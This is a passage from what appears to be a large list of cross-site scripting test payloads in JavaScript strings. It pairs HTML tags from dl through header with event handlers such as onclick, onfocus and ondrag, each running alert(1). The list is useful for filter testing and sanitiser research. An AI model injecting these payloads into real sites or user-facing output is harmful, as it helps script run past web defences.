tabindex=1 id=x></dl><input autofocus>' +xss,'<dl onkeydown="alert(1)" contenteditable>test</dl>' +xss,'<dl onkeypress="alert(1)" contenteditable>test</dl>' +xss,'<dl onkeyup="alert(1)" contenteditable>test</dl>' +xss,'<dl onmousedown="alert(1)">test</dl>' +xss,'<dl onmouseenter="alert(1)">test</dl>' +xss,'<dl onmouseleave="alert(1)">test</dl>' +xss,'<dl onmousemove="alert(1)">test</dl>' +xss,'<dl onmouseout="alert(1)">test</dl>' +xss,'<dl onmouseover="alert(1)">test</dl>' +xss,'<dl onmouseup="alert(1)">test</dl>' +xss,'<dl onpaste="alert(1)" contenteditable>test</dl>' +xss,'<dt draggable="true" ondrag="alert(1)">test</dt>' +xss,'<dt draggable="true" ondragend="alert(1)">test</dt>' +xss,'<dt draggable="true" ondragenter="alert(1)">test</dt>' +xss,'<dt draggable="true" ondragleave="alert(1)">test</dt>' +xss,'<dt draggable="true" ondragstart="alert(1)">test</dt>' +xss,'<dt id=x tabindex=1 onactivate=alert(1)></dt>' +xss,'<dt id=x tabindex=1 onbeforeactivate=alert(1)></dt>' +xss,'<dt id=x tabindex=1 onbeforedeactivate=alert(1)></dt><input autofocus>' +xss,'<dt id=x tabindex=1 ondeactivate=alert(1)></dt><input id=y autofocus>' +xss,'<dt id=x tabindex=1 onfocus=alert(1)></dt>' +xss,'<dt id=x tabindex=1 onfocusin=alert(1)></dt>' +xss,'<dt onbeforecopy="alert(1)" contenteditable>test</dt>' +xss,'<dt onbeforecut="alert(1)" contenteditable>test</dt>' +xss,'<dt onbeforepaste="alert(1)" contenteditable>test</dt>' +xss,'<dt onblur=alert(1) tabindex=1 id=x></dt><input autofocus>' +xss,'<dt onclick="alert(1)">test</dt>' +xss,'<dt oncontextmenu="alert(1)">test</dt>' +xss,'<dt oncopy="alert(1)" contenteditable>test</dt>' +xss,'<dt oncut="alert(1)" contenteditable>test</dt>' +xss,'<dt ondblclick="alert(1)">test</dt>' +xss,'<dt onfocusout=alert(1) tabindex=1 id=x></dt><input autofocus>' +xss,'<dt onkeydown="alert(1)" contenteditable>test</dt>' +xss,'<dt onkeypress="alert(1)" contenteditable>test</dt>' +xss,'<dt onkeyup="alert(1)" contenteditable>test</dt>' +xss,'<dt onmousedown="alert(1)">test</dt>' +xss,'<dt onmouseenter="alert(1)">test</dt>' +xss,'<dt onmouseleave="alert(1)">test</dt>' +xss,'<dt onmousemove="alert(1)">test</dt>' +xss,'<dt onmouseout="alert(1)">test</dt>' +xss,'<dt onmouseover="alert(1)">test</dt>' +xss,'<dt onmouseup="alert(1)">test</dt>' +xss,'<dt onpaste="alert(1)" contenteditable>test</dt>' +xss,'<element draggable="true" ondrag="alert(1)">test</element>' +xss,'<element draggable="true" ondragend="alert(1)">test</element>' +xss,'<element draggable="true" ondragenter="alert(1)">test</element>' +xss,'<element draggable="true" ondragleave="alert(1)">test</element>' +xss,'<element draggable="true" ondragstart="alert(1)">test</element>' +xss,'<element id=x tabindex=1 onactivate=alert(1)></element>' +xss,'<element id=x tabindex=1 onbeforeactivate=alert(1)></element>' +xss,'<element id=x tabindex=1 onbeforedeactivate=alert(1)></element><input autofocus>' +xss,'<element id=x tabindex=1 ondeactivate=alert(1)></element><input id=y autofocus>' +xss,'<element id=x tabindex=1 onfocus=alert(1)></element>' +xss,'<element id=x tabindex=1 onfocusin=alert(1)></element>' +xss,'<element onbeforecopy="alert(1)" contenteditable>test</element>' +xss,'<element onbeforecut="alert(1)" contenteditable>test</element>' +xss,'<element onbeforepaste="alert(1)" contenteditable>test</element>' +xss,'<element onblur=alert(1) tabindex=1 id=x></element><input autofocus>' +xss,'<element onclick="alert(1)">test</element>' +xss,'<element oncontextmenu="alert(1)">test</element>' +xss,'<element oncopy="alert(1)" contenteditable>test</element>' +xss,'<element oncut="alert(1)" contenteditable>test</element>' +xss,'<element ondblclick="alert(1)">test</element>' +xss,'<element onfocusout=alert(1) tabindex=1 id=x></element><input autofocus>' +xss,'<element onkeydown="alert(1)" contenteditable>test</element>' +xss,'<element onkeypress="alert(1)" contenteditable>test</element>' +xss,'<element onkeyup="alert(1)" contenteditable>test</element>' +xss,'<element onmousedown="alert(1)">test</element>' +xss,'<element onmouseenter="alert(1)">test</element>' +xss,'<element onmouseleave="alert(1)">test</element>' +xss,'<element onmousemove="alert(1)">test</element>' +xss,'<element onmouseout="alert(1)">test</element>' +xss,'<element onmouseover="alert(1)">test</element>' +xss,'<element onmouseup="alert(1)">test</element>' +xss,'<element onpaste="alert(1)" contenteditable>test</element>' +xss,'<em draggable="true" ondrag="alert(1)">test</em>' +xss,'<em draggable="true" ondragend="alert(1)">test</em>' +xss,'<em draggable="true" ondragenter="alert(1)">test</em>' +xss,'<em draggable="true" ondragleave="alert(1)">test</em>' +xss,'<em draggable="true" ondragstart="alert(1)">test</em>' +xss,'<em id=x tabindex=1 onactivate=alert(1)></em>' +xss,'<em id=x tabindex=1 onbeforeactivate=alert(1)></em>' +xss,'<em id=x tabindex=1 onbeforedeactivate=alert(1)></em><input autofocus>' +xss,'<em id=x tabindex=1 ondeactivate=alert(1)></em><input id=y autofocus>' +xss,'<em id=x tabindex=1 onfocus=alert(1)></em>' +xss,'<em id=x tabindex=1 onfocusin=alert(1)></em>' +xss,'<em onbeforecopy="alert(1)" contenteditable>test</em>' +xss,'<em onbeforecut="alert(1)" contenteditable>test</em>' +xss,'<em onbeforepaste="alert(1)" contenteditable>test</em>' +xss,'<em onblur=alert(1) tabindex=1 id=x></em><input autofocus>' +xss,'<em onclick="alert(1)">test</em>' +xss,'<em oncontextmenu="alert(1)">test</em>' +xss,'<em oncopy="alert(1)" contenteditable>test</em>' +xss,'<em oncut="alert(1)" contenteditable>test</em>' +xss,'<em ondblclick="alert(1)">test</em>' +xss,'<em onfocusout=alert(1) tabindex=1 id=x></em><input autofocus>' +xss,'<em onkeydown="alert(1)" contenteditable>test</em>' +xss,'<em onkeypress="alert(1)" contenteditable>test</em>' +xss,'<em onkeyup="alert(1)" contenteditable>test</em>' +xss,'<em onmousedown="alert(1)">test</em>' +xss,'<em onmouseenter="alert(1)">test</em>' +xss,'<em onmouseleave="alert(1)">test</em>' +xss,'<em onmousemove="alert(1)">test</em>' +xss,'<em onmouseout="alert(1)">test</em>' +xss,'<em onmouseover="alert(1)">test</em>' +xss,'<em onmouseup="alert(1)">test</em>' +xss,'<em onpaste="alert(1)" contenteditable>test</em>' +xss,'<embed draggable="true" ondrag="alert(1)">test</embed>' +xss,'<embed draggable="true" ondragend="alert(1)">test</embed>' +xss,'<embed draggable="true" ondragenter="alert(1)">test</embed>' +xss,'<embed draggable="true" ondragleave="alert(1)">test</embed>' +xss,'<embed draggable="true" ondragstart="alert(1)">test</embed>' +xss,'<embed id=x onfocus=alert(1) type=text/html>' +xss,'<embed id=x onfocusin=alert(1) type=text/html>' +xss,'<embed id=x tabindex=1 onactivate=alert(1)></embed>' +xss,'<embed id=x tabindex=1 onbeforeactivate=alert(1)></embed>' +xss,'<embed id=x tabindex=1 onbeforedeactivate=alert(1)></embed><input autofocus>' +xss,'<embed id=x tabindex=1 ondeactivate=alert(1)></embed><input id=y autofocus>' +xss,'<embed onbeforecopy="alert(1)" contenteditable>test</embed>' +xss,'<embed onbeforecut="alert(1)" contenteditable>test</embed>' +xss,'<embed onbeforepaste="alert(1)" contenteditable>test</embed>' +xss,'<embed onblur=alert(1) tabindex=1 id=x></embed><input autofocus>' +xss,'<embed onclick="alert(1)">test</embed>' +xss,'<embed oncontextmenu="alert(1)">test</embed>' +xss,'<embed oncopy="alert(1)" contenteditable>test</embed>' +xss,'<embed oncut="alert(1)" contenteditable>test</embed>' +xss,'<embed ondblclick="alert(1)">test</embed>' +xss,'<embed onfocusout=alert(1) tabindex=1 id=x></embed><input autofocus>' +xss,'<embed onkeydown="alert(1)" contenteditable>test</embed>' +xss,'<embed onkeypress="alert(1)" contenteditable>test</embed>' +xss,'<embed onkeyup="alert(1)" contenteditable>test</embed>' +xss,'<embed onmousedown="alert(1)">test</embed>' +xss,'<embed onmouseenter="alert(1)">test</embed>' +xss,'<embed onmouseleave="alert(1)">test</embed>' +xss,'<embed onmousemove="alert(1)">test</embed>' +xss,'<embed onmouseout="alert(1)">test</embed>' +xss,'<embed onmouseover="alert(1)">test</embed>' +xss,'<embed onmouseup="alert(1)">test</embed>' +xss,'<embed onpaste="alert(1)" contenteditable>test</embed>' +xss,'<embed src=/ onload=alert(1)>' +xss,'<embed src=1 onerror=alert(1) type=image/gif>' +xss,'<fieldset draggable="true" ondrag="alert(1)">test</fieldset>' +xss,'<fieldset draggable="true" ondragend="alert(1)">test</fieldset>' +xss,'<fieldset draggable="true" ondragenter="alert(1)">test</fieldset>' +xss,'<fieldset draggable="true" ondragleave="alert(1)">test</fieldset>' +xss,'<fieldset draggable="true" ondragstart="alert(1)">test</fieldset>' +xss,'<fieldset id=x tabindex=1 onactivate=alert(1)></fieldset>' +xss,'<fieldset id=x tabindex=1 onbeforeactivate=alert(1)></fieldset>' +xss,'<fieldset id=x tabindex=1 onbeforedeactivate=alert(1)></fieldset><input autofocus>' +xss,'<fieldset id=x tabindex=1 ondeactivate=alert(1)></fieldset><input id=y autofocus>' +xss,'<fieldset id=x tabindex=1 onfocus=alert(1)></fieldset>' +xss,'<fieldset id=x tabindex=1 onfocusin=alert(1)></fieldset>' +xss,'<fieldset onbeforecopy="alert(1)" contenteditable>test</fieldset>' +xss,'<fieldset onbeforecut="alert(1)" contenteditable>test</fieldset>' +xss,'<fieldset onbeforepaste="alert(1)" contenteditable>test</fieldset>' +xss,'<fieldset onblur=alert(1) tabindex=1 id=x></fieldset><input autofocus>' +xss,'<fieldset onclick="alert(1)">test</fieldset>' +xss,'<fieldset oncontextmenu="alert(1)">test</fieldset>' +xss,'<fieldset oncopy="alert(1)" contenteditable>test</fieldset>' +xss,'<fieldset oncut="alert(1)" contenteditable>test</fieldset>' +xss,'<fieldset ondblclick="alert(1)">test</fieldset>' +xss,'<fieldset onfocusout=alert(1) tabindex=1 id=x></fieldset><input autofocus>' +xss,'<fieldset onkeydown="alert(1)" contenteditable>test</fieldset>' +xss,'<fieldset onkeypress="alert(1)" contenteditable>test</fieldset>' +xss,'<fieldset onkeyup="alert(1)" contenteditable>test</fieldset>' +xss,'<fieldset onmousedown="alert(1)">test</fieldset>' +xss,'<fieldset onmouseenter="alert(1)">test</fieldset>' +xss,'<fieldset onmouseleave="alert(1)">test</fieldset>' +xss,'<fieldset onmousemove="alert(1)">test</fieldset>' +xss,'<fieldset onmouseout="alert(1)">test</fieldset>' +xss,'<fieldset onmouseover="alert(1)">test</fieldset>' +xss,'<fieldset onmouseup="alert(1)">test</fieldset>' +xss,'<fieldset onpaste="alert(1)" contenteditable>test</fieldset>' +xss,'<figcaption draggable="true" ondrag="alert(1)">test</figcaption>' +xss,'<figcaption draggable="true" ondragend="alert(1)">test</figcaption>' +xss,'<figcaption draggable="true" ondragenter="alert(1)">test</figcaption>' +xss,'<figcaption draggable="true" ondragleave="alert(1)">test</figcaption>' +xss,'<figcaption draggable="true" ondragstart="alert(1)">test</figcaption>' +xss,'<figcaption id=x tabindex=1 onactivate=alert(1)></figcaption>' +xss,'<figcaption id=x tabindex=1 onbeforeactivate=alert(1)></figcaption>' +xss,'<figcaption id=x tabindex=1 onbeforedeactivate=alert(1)></figcaption><input autofocus>' +xss,'<figcaption id=x tabindex=1 ondeactivate=alert(1)></figcaption><input id=y autofocus>' +xss,'<figcaption id=x tabindex=1 onfocus=alert(1)></figcaption>' +xss,'<figcaption id=x tabindex=1 onfocusin=alert(1)></figcaption>' +xss,'<figcaption onbeforecopy="alert(1)" contenteditable>test</figcaption>' +xss,'<figcaption onbeforecut="alert(1)" contenteditable>test</figcaption>' +xss,'<figcaption onbeforepaste="alert(1)" contenteditable>test</figcaption>' +xss,'<figcaption onblur=alert(1) tabindex=1 id=x></figcaption><input autofocus>' +xss,'<figcaption onclick="alert(1)">test</figcaption>' +xss,'<figcaption oncontextmenu="alert(1)">test</figcaption>' +xss,'<figcaption oncopy="alert(1)" contenteditable>test</figcaption>' +xss,'<figcaption oncut="alert(1)" contenteditable>test</figcaption>' +xss,'<figcaption ondblclick="alert(1)">test</figcaption>' +xss,'<figcaption onfocusout=alert(1) tabindex=1 id=x></figcaption><input autofocus>' +xss,'<figcaption onkeydown="alert(1)" contenteditable>test</figcaption>' +xss,'<figcaption onkeypress="alert(1)" contenteditable>test</figcaption>' +xss,'<figcaption onkeyup="alert(1)" contenteditable>test</figcaption>' +xss,'<figcaption onmousedown="alert(1)">test</figcaption>' +xss,'<figcaption onmouseenter="alert(1)">test</figcaption>' +xss,'<figcaption onmouseleave="alert(1)">test</figcaption>' +xss,'<figcaption onmousemove="alert(1)">test</figcaption>' +xss,'<figcaption onmouseout="alert(1)">test</figcaption>' +xss,'<figcaption onmouseover="alert(1)">test</figcaption>' +xss,'<figcaption onmouseup="alert(1)">test</figcaption>' +xss,'<figcaption onpaste="alert(1)" contenteditable>test</figcaption>' +xss,'<figure draggable="true" ondrag="alert(1)">test</figure>' +xss,'<figure draggable="true" ondragend="alert(1)">test</figure>' +xss,'<figure draggable="true" ondragenter="alert(1)">test</figure>' +xss,'<figure draggable="true" ondragleave="alert(1)">test</figure>' +xss,'<figure draggable="true" ondragstart="alert(1)">test</figure>' +xss,'<figure id=x tabindex=1 onactivate=alert(1)></figure>' +xss,'<figure id=x tabindex=1 onbeforeactivate=alert(1)></figure>' +xss,'<figure id=x tabindex=1 onbeforedeactivate=alert(1)></figure><input autofocus>' +xss,'<figure id=x tabindex=1 ondeactivate=alert(1)></figure><input id=y autofocus>' +xss,'<figure id=x tabindex=1 onfocus=alert(1)></figure>' +xss,'<figure id=x tabindex=1 onfocusin=alert(1)></figure>' +xss,'<figure onbeforecopy="alert(1)" contenteditable>test</figure>' +xss,'<figure onbeforecut="alert(1)" contenteditable>test</figure>' +xss,'<figure onbeforepaste="alert(1)" contenteditable>test</figure>' +xss,'<figure onblur=alert(1) tabindex=1 id=x></figure><input autofocus>' +xss,'<figure onclick="alert(1)">test</figure>' +xss,'<figure oncontextmenu="alert(1)">test</figure>' +xss,'<figure oncopy="alert(1)" contenteditable>test</figure>' +xss,'<figure oncut="alert(1)" contenteditable>test</figure>' +xss,'<figure ondblclick="alert(1)">test</figure>' +xss,'<figure onfocusout=alert(1) tabindex=1 id=x></figure><input autofocus>' +xss,'<figure onkeydown="alert(1)" contenteditable>test</figure>' +xss,'<figure onkeypress="alert(1)" contenteditable>test</figure>' +xss,'<figure onkeyup="alert(1)" contenteditable>test</figure>' +xss,'<figure onmousedown="alert(1)">test</figure>' +xss,'<figure onmouseenter="alert(1)">test</figure>' +xss,'<figure onmouseleave="alert(1)">test</figure>' +xss,'<figure onmousemove="alert(1)">test</figure>' +xss,'<figure onmouseout="alert(1)">test</figure>' +xss,'<figure onmouseover="alert(1)">test</figure>' +xss,'<figure onmouseup="alert(1)">test</figure>' +xss,'<figure onpaste="alert(1)" contenteditable>test</figure>' +xss,'<font draggable="true" ondrag="alert(1)">test</font>' +xss,'<font draggable="true" ondragend="alert(1)">test</font>' +xss,'<font draggable="true" ondragenter="alert(1)">test</font>' +xss,'<font draggable="true" ondragleave="alert(1)">test</font>' +xss,'<font draggable="true" ondragstart="alert(1)">test</font>' +xss,'<font id=x tabindex=1 onactivate=alert(1)></font>' +xss,'<font id=x tabindex=1 onbeforeactivate=alert(1)></font>' +xss,'<font id=x tabindex=1 onbeforedeactivate=alert(1)></font><input autofocus>' +xss,'<font id=x tabindex=1 ondeactivate=alert(1)></font><input id=y autofocus>' +xss,'<font id=x tabindex=1 onfocus=alert(1)></font>' +xss,'<font id=x tabindex=1 onfocusin=alert(1)></font>' +xss,'<font onbeforecopy="alert(1)" contenteditable>test</font>' +xss,'<font onbeforecut="alert(1)" contenteditable>test</font>' +xss,'<font onbeforepaste="alert(1)" contenteditable>test</font>' +xss,'<font onblur=alert(1) tabindex=1 id=x></font><input autofocus>' +xss,'<font onclick="alert(1)">test</font>' +xss,'<font oncontextmenu="alert(1)">test</font>' +xss,'<font oncopy="alert(1)" contenteditable>test</font>' +xss,'<font oncut="alert(1)" contenteditable>test</font>' +xss,'<font ondblclick="alert(1)">test</font>' +xss,'<font onfocusout=alert(1) tabindex=1 id=x></font><input autofocus>' +xss,'<font onkeydown="alert(1)" contenteditable>test</font>' +xss,'<font onkeypress="alert(1)" contenteditable>test</font>' +xss,'<font onkeyup="alert(1)" contenteditable>test</font>' +xss,'<font onmousedown="alert(1)">test</font>' +xss,'<font onmouseenter="alert(1)">test</font>' +xss,'<font onmouseleave="alert(1)">test</font>' +xss,'<font onmousemove="alert(1)">test</font>' +xss,'<font onmouseout="alert(1)">test</font>' +xss,'<font onmouseover="alert(1)">test</font>' +xss,'<font onmouseup="alert(1)">test</font>' +xss,'<font onpaste="alert(1)" contenteditable>test</font>' +xss,'<footer draggable="true" ondrag="alert(1)">test</footer>' +xss,'<footer draggable="true" ondragend="alert(1)">test</footer>' +xss,'<footer draggable="true" ondragenter="alert(1)">test</footer>' +xss,'<footer draggable="true" ondragleave="alert(1)">test</footer>' +xss,'<footer draggable="true" ondragstart="alert(1)">test</footer>' +xss,'<footer id=x tabindex=1 onactivate=alert(1)></footer>' +xss,'<footer id=x tabindex=1 onbeforeactivate=alert(1)></footer>' +xss,'<footer id=x tabindex=1 onbeforedeactivate=alert(1)></footer><input autofocus>' +xss,'<footer id=x tabindex=1 ondeactivate=alert(1)></footer><input id=y autofocus>' +xss,'<footer id=x tabindex=1 onfocus=alert(1)></footer>' +xss,'<footer id=x tabindex=1 onfocusin=alert(1)></footer>' +xss,'<footer onbeforecopy="alert(1)" contenteditable>test</footer>' +xss,'<footer onbeforecut="alert(1)" contenteditable>test</footer>' +xss,'<footer onbeforepaste="alert(1)" contenteditable>test</footer>' +xss,'<footer onblur=alert(1) tabindex=1 id=x></footer><input autofocus>' +xss,'<footer onclick="alert(1)">test</footer>' +xss,'<footer oncontextmenu="alert(1)">test</footer>' +xss,'<footer oncopy="alert(1)" contenteditable>test</footer>' +xss,'<footer oncut="alert(1)" contenteditable>test</footer>' +xss,'<footer ondblclick="alert(1)">test</footer>' +xss,'<footer onfocusout=alert(1) tabindex=1 id=x></footer><input autofocus>' +xss,'<footer onkeydown="alert(1)" contenteditable>test</footer>' +xss,'<footer onkeypress="alert(1)" contenteditable>test</footer>' +xss,'<footer onkeyup="alert(1)" contenteditable>test</footer>' +xss,'<footer onmousedown="alert(1)">test</footer>' +xss,'<footer onmouseenter="alert(1)">test</footer>' +xss,'<footer onmouseleave="alert(1)">test</footer>' +xss,'<footer onmousemove="alert(1)">test</footer>' +xss,'<footer onmouseout="alert(1)">test</footer>' +xss,'<footer onmouseover="alert(1)">test</footer>' +xss,'<footer onmouseup="alert(1)">test</footer>' +xss,'<footer onpaste="alert(1)" contenteditable>test</footer>' +xss,'<form draggable="true" ondrag="alert(1)">test</form>' +xss,'<form draggable="true" ondragend="alert(1)">test</form>' +xss,'<form draggable="true" ondragenter="alert(1)">test</form>' +xss,'<form draggable="true" ondragleave="alert(1)">test</form>' +xss,'<form draggable="true" ondragstart="alert(1)">test</form>' +xss,'<form id=x tabindex=1 onactivate=alert(1)></form>' +xss,'<form id=x tabindex=1 onbeforeactivate=alert(1)></form>' +xss,'<form id=x tabindex=1 onbeforedeactivate=alert(1)></form><input autofocus>' +xss,'<form id=x tabindex=1 ondeactivate=alert(1)></form><input id=y autofocus>' +xss,'<form id=x tabindex=1 onfocus=alert(1)></form>' +xss,'<form id=x tabindex=1 onfocusin=alert(1)></form>' +xss,'<form onbeforecopy="alert(1)" contenteditable>test</form>' +xss,'<form onbeforecut="alert(1)" contenteditable>test</form>' +xss,'<form onbeforepaste="alert(1)" contenteditable>test</form>' +xss,'<form onblur=alert(1) tabindex=1 id=x></form><input autofocus>' +xss,'<form onclick="alert(1)">test</form>' +xss,'<form oncontextmenu="alert(1)">test</form>' +xss,'<form oncopy="alert(1)" contenteditable>test</form>' +xss,'<form oncut="alert(1)" contenteditable>test</form>' +xss,'<form ondblclick="alert(1)">test</form>' +xss,'<form onfocusout=alert(1) tabindex=1 id=x></form><input autofocus>' +xss,'<form onkeydown="alert(1)" contenteditable>test</form>' +xss,'<form onkeypress="alert(1)" contenteditable>test</form>' +xss,'<form onkeyup="alert(1)" contenteditable>test</form>' +xss,'<form onmousedown="alert(1)">test</form>' +xss,'<form onmouseenter="alert(1)">test</form>' +xss,'<form onmouseleave="alert(1)">test</form>' +xss,'<form onmousemove="alert(1)">test</form>' +xss,'<form onmouseout="alert(1)">test</form>' +xss,'<form onmouseover="alert(1)">test</form>' +xss,'<form onmouseup="alert(1)">test</form>' +xss,'<form onpaste="alert(1)" contenteditable>test</form>' +xss,'<form onreset=alert(1)><input type=reset>' +xss,'<form onsubmit=alert(1)><input type=submit>' +xss,'<form><input oninvalid=alert(1) required><input type=submit>' +xss,'<form><input type=search onsearch=alert(1) value="Hit return" autofocus>' +xss,'<form><textarea oninvalid=alert(1) required><input type=submit>' +xss,'<frame draggable="true" ondrag="alert(1)">test</frame>' +xss,'<frame draggable="true" ondragend="alert(1)">test</frame>' +xss,'<frame draggable="true" ondragenter="alert(1)">test</frame>' +xss,'<frame draggable="true" ondragleave="alert(1)">test</frame>' +xss,'<frame draggable="true" ondragstart="alert(1)">test</frame>' +xss,'<frame id=x tabindex=1 onactivate=alert(1)></frame>' +xss,'<frame id=x tabindex=1 onbeforeactivate=alert(1)></frame>' +xss,'<frame id=x tabindex=1 onbeforedeactivate=alert(1)></frame><input autofocus>' +xss,'<frame id=x tabindex=1 ondeactivate=alert(1)></frame><input id=y autofocus>' +xss,'<frame onbeforecopy="alert(1)" contenteditable>test</frame>' +xss,'<frame onbeforecut="alert(1)" contenteditable>test</frame>' +xss,'<frame onbeforepaste="alert(1)" contenteditable>test</frame>' +xss,'<frame onblur=alert(1) tabindex=1 id=x></frame><input autofocus>' +xss,'<frame onclick="alert(1)">test</frame>' +xss,'<frame oncontextmenu="alert(1)">test</frame>' +xss,'<frame oncopy="alert(1)" contenteditable>test</frame>' +xss,'<frame oncut="alert(1)" contenteditable>test</frame>' +xss,'<frame ondblclick="alert(1)">test</frame>' +xss,'<frame onfocusout=alert(1) tabindex=1 id=x></frame><input autofocus>' +xss,'<frame onkeydown="alert(1)" contenteditable>test</frame>' +xss,'<frame onkeypress="alert(1)" contenteditable>test</frame>' +xss,'<frame onkeyup="alert(1)" contenteditable>test</frame>' +xss,'<frame onmousedown="alert(1)">test</frame>' +xss,'<frame onmouseenter="alert(1)">test</frame>' +xss,'<frame onmouseleave="alert(1)">test</frame>' +xss,'<frame onmousemove="alert(1)">test</frame>' +xss,'<frame onmouseout="alert(1)">test</frame>' +xss,'<frame onmouseover="alert(1)">test</frame>' +xss,'<frame onmouseup="alert(1)">test</frame>' +xss,'<frame onpaste="alert(1)" contenteditable>test</frame>' +xss,'<frameset draggable="true" ondrag="alert(1)">test</frameset>' +xss,'<frameset draggable="true" ondragend="alert(1)">test</frameset>' +xss,'<frameset draggable="true" ondragenter="alert(1)">test</frameset>' +xss,'<frameset draggable="true" ondragleave="alert(1)">test</frameset>' +xss,'<frameset draggable="true" ondragstart="alert(1)">test</frameset>' +xss,'<frameset id=x tabindex=1 onactivate=alert(1)></frameset>' +xss,'<frameset id=x tabindex=1 onbeforeactivate=alert(1)></frameset>' +xss,'<frameset id=x tabindex=1 onbeforedeactivate=alert(1)></frameset><input autofocus>' +xss,'<frameset id=x tabindex=1 ondeactivate=alert(1)></frameset><input id=y autofocus>' +xss,'<frameset id=x tabindex=1 onfocus=alert(1)></frameset>' +xss,'<frameset id=x tabindex=1 onfocusin=alert(1)></frameset>' +xss,'<frameset onbeforecopy="alert(1)" contenteditable>test</frameset>' +xss,'<frameset onbeforecut="alert(1)" contenteditable>test</frameset>' +xss,'<frameset onbeforepaste="alert(1)" contenteditable>test</frameset>' +xss,'<frameset onblur=alert(1) tabindex=1 id=x></frameset><input autofocus>' +xss,'<frameset onclick="alert(1)">test</frameset>' +xss,'<frameset oncontextmenu="alert(1)">test</frameset>' +xss,'<frameset oncopy="alert(1)" contenteditable>test</frameset>' +xss,'<frameset oncut="alert(1)" contenteditable>test</frameset>' +xss,'<frameset ondblclick="alert(1)">test</frameset>' +xss,'<frameset onfocusout=alert(1) tabindex=1 id=x></frameset><input autofocus>' +xss,'<frameset onkeydown="alert(1)" contenteditable>test</frameset>' +xss,'<frameset onkeypress="alert(1)" contenteditable>test</frameset>' +xss,'<frameset onkeyup="alert(1)" contenteditable>test</frameset>' +xss,'<frameset onmousedown="alert(1)">test</frameset>' +xss,'<frameset onmouseenter="alert(1)">test</frameset>' +xss,'<frameset onmouseleave="alert(1)">test</frameset>' +xss,'<frameset onmousemove="alert(1)">test</frameset>' +xss,'<frameset onmouseout="alert(1)">test</frameset>' +xss,'<frameset onmouseover="alert(1)">test</frameset>' +xss,'<frameset onmouseup="alert(1)">test</frameset>' +xss,'<frameset onpageshow=alert(1)>' +xss,'<frameset onpaste="alert(1)" contenteditable>test</frameset>' +xss,'<frameset><frame id=x onfocus=alert(1)>' +xss,'<frameset><frame id=x onfocusin=alert(1)>' +xss,'<frameset><frame onload=alert(1)>' +xss,'<h1 draggable="true" ondrag="alert(1)">test</h1>' +xss,'<h1 draggable="true" ondragend="alert(1)">test</h1>' +xss,'<h1 draggable="true" ondragenter="alert(1)">test</h1>' +xss,'<h1 draggable="true" ondragleave="alert(1)">test</h1>' +xss,'<h1 draggable="true" ondragstart="alert(1)">test</h1>' +xss,'<h1 id=x tabindex=1 onactivate=alert(1)></h1>' +xss,'<h1 id=x tabindex=1 onbeforeactivate=alert(1)></h1>' +xss,'<h1 id=x tabindex=1 onbeforedeactivate=alert(1)></h1><input autofocus>' +xss,'<h1 id=x tabindex=1 ondeactivate=alert(1)></h1><input id=y autofocus>' +xss,'<h1 id=x tabindex=1 onfocus=alert(1)></h1>' +xss,'<h1 id=x tabindex=1 onfocusin=alert(1)></h1>' +xss,'<h1 onbeforecopy="alert(1)" contenteditable>test</h1>' +xss,'<h1 onbeforecut="alert(1)" contenteditable>test</h1>' +xss,'<h1 onbeforepaste="alert(1)" contenteditable>test</h1>' +xss,'<h1 onblur=alert(1) tabindex=1 id=x></h1><input autofocus>' +xss,'<h1 onclick="alert(1)">test</h1>' +xss,'<h1 oncontextmenu="alert(1)">test</h1>' +xss,'<h1 oncopy="alert(1)" contenteditable>test</h1>' +xss,'<h1 oncut="alert(1)" contenteditable>test</h1>' +xss,'<h1 ondblclick="alert(1)">test</h1>' +xss,'<h1 onfocusout=alert(1) tabindex=1 id=x></h1><input autofocus>' +xss,'<h1 onkeydown="alert(1)" contenteditable>test</h1>' +xss,'<h1 onkeypress="alert(1)" contenteditable>test</h1>' +xss,'<h1 onkeyup="alert(1)" contenteditable>test</h1>' +xss,'<h1 onmousedown="alert(1)">test</h1>' +xss,'<h1 onmouseenter="alert(1)">test</h1>' +xss,'<h1 onmouseleave="alert(1)">test</h1>' +xss,'<h1 onmousemove="alert(1)">test</h1>' +xss,'<h1 onmouseout="alert(1)">test</h1>' +xss,'<h1 onmouseover="alert(1)">test</h1>' +xss,'<h1 onmouseup="alert(1)">test</h1>' +xss,'<h1 onpaste="alert(1)" contenteditable>test</h1>' +xss,'<head draggable="true" ondrag="alert(1)">test</head>' +xss,'<head draggable="true" ondragend="alert(1)">test</head>' +xss,'<head draggable="true" ondragenter="alert(1)">test</head>' +xss,'<head draggable="true" ondragleave="alert(1)">test</head>' +xss,'<head draggable="true" ondragstart="alert(1)">test</head>' +xss,'<head id=x tabindex=1 onactivate=alert(1)></head>' +xss,'<head id=x tabindex=1 onbeforeactivate=alert(1)></head>' +xss,'<head id=x tabindex=1 onbeforedeactivate=alert(1)></head><input autofocus>' +xss,'<head id=x tabindex=1 ondeactivate=alert(1)></head><input id=y autofocus>' +xss,'<head id=x tabindex=1 onfocus=alert(1)></head>' +xss,'<head id=x tabindex=1 onfocusin=alert(1)></head>' +xss,'<head onbeforecopy="alert(1)" contenteditable>test</head>' +xss,'<head onbeforecut="alert(1)" contenteditable>test</head>' +xss,'<head onbeforepaste="alert(1)" contenteditable>test</head>' +xss,'<head onblur=alert(1) tabindex=1 id=x></head><input autofocus>' +xss,'<head onclick="alert(1)">test</head>' +xss,'<head oncontextmenu="alert(1)">test</head>' +xss,'<head oncopy="alert(1)" contenteditable>test</head>' +xss,'<head oncut="alert(1)" contenteditable>test</head>' +xss,'<head ondblclick="alert(1)">test</head>' +xss,'<head onfocusout=alert(1) tabindex=1 id=x></head><input autofocus>' +xss,'<head onkeydown="alert(1)" contenteditable>test</head>' +xss,'<head onkeypress="alert(1)" contenteditable>test</head>' +xss,'<head onkeyup="alert(1)" contenteditable>test</head>' +xss,'<head onmousedown="alert(1)">test</head>' +xss,'<head onmouseenter="alert(1)">test</head>' +xss,'<head onmouseleave="alert(1)">test</head>' +xss,'<head onmousemove="alert(1)">test</head>' +xss,'<head onmouseout="alert(1)">test</head>' +xss,'<head onmouseover="alert(1)">test</head>' +xss,'<head onmouseup="alert(1)">test</head>' +xss,'<head onpaste="alert(1)" contenteditable>test</head>' +xss,'<header draggable="true" ondrag="alert(1)">test</header>' +xss,'<header draggable="true" ondragend="alert(1)">test</header>' +xss,'<header draggable="true" ondragenter="alert(1)">test</header>' +xss,'<header draggable="true" ondragleave="alert(1)">test</header>' +xss,'<header draggable="true" ondragstart="alert(1)">test</header>' +xss,'<header id=x tabindex=1 onactivate=alert(1)></header>' +xss,'<header id=x tabindex=1 onbeforeactivate=alert(1)></header>' +xss,'<header id=x tabindex=1 